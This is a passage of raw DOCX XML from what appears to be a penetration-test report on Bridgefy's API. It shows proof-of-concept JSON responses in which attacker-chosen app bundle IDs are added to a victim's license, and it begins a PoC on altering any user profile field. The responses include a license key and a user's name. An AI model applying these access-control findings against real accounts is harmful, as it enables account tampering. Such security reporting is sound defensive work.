        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="475"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This PoC demonstrates that attackers can add their own app bundles to the license of the victim user:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"6398c89972ee224bd5f0f970"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Monitor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"eee06afe-19eb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4ed9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-a907-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>c38f2167c001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bundleIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewDevelopment:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.m ain.dev:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewStaging:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNew:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgef y.main.qa:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.template.dev:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.stagin g:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.example.org:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.example2.org:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.owned.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.18621200092188.062</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.28330513147285.34.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.32703124033018.605.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.6018424592246</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7.78.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.57121640144341.65.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.76048147588686.55.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.6752381054</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2330.984.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.82539972419375.39.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.44839708381482.08.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.807819</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>19366178.47.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"com.99339090060368.05.com:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="252"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="27"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>demonstrates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>modify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>well:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="26"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"639893112017b2dfe4319370"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"firstName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Julian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"lastName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
